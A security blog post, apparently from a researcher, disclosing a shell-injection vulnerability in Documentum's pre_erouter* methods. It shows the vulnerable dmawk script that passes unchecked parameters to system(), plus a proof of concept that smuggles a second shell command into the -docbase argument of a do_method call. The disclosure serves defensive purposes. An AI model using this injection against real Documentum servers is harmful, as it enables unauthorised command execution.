documentum security vulnerabilities: pre_erouter* methods

As other vulnerable methods (dm_event_sender, replicate_setup_methods) pre_erouter* methods do not check input parameters and can be used to execute any shell command:

API> retrieve,c,dm_method where object_name like 'pre_erouter%'
...
1001ffd78000046c
API> dump,c,l
...
USER ATTRIBUTES

  object_name                     : pre_erouter1_queue
  owner_name                      : dmadmin
  owner_permit                    : 7
  group_name                      : docu
  group_permit                    : 5
  world_permit                    : 3
  method_verb                     : dmawk
  launch_direct                   : F
  launch_async                    : F
  trace_launch                    : T
  run_as_server                   : T
  use_method_content              : T
  method_type                     : dmawk
  use_method_server               : F
  is_restartable                  : F
#  Echo_attr()
  cmdstr = "dmbasic -f " dm_home"/bin/dm_rendPDF_preq.ebs" \
        " -e preq -- " \
        " -docbase " docbase_name \
        " -user " user_name \
        " -router " routerid \
        " -package " packageid \
        " -task " task \
        " -source " source \
        " -ticket " ticket
  ret = system(cmdstr)
  exit (ret)

example of exploitation:

 ~]$ cat  /tmp/test
cat: /tmp/test: No such file or directory
 ~]$ idql repo -Uusername -Ppassword >/dev/null <<_EOF_
> execute do_method with method='pre_erouter4_forward',
> arguments='-docbase ";echo awk_methods_have_vulnerability > /tmp/test;"'
> go
> _EOF_

 ~]$ cat  /tmp/test
awk_methods_have_vulnerability
 ~]$

This vulnerability was reported as CS-44409 (Security vulnerability with pre_erouter methods – shell injection)

3 thoughts on “documentum security vulnerabilities: pre_erouter* methods

  1. Pingback: God bless EMC. Part VII | Documentum in a (nuts)HELL
  2. Pingback: Is it possible to compromise Documentum by deleting object? Typical mistakes | Documentum in a (nuts)HELL
  3. Pingback: How long does it take to remediate security flaw? | Documentum in a (nuts)HELL

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s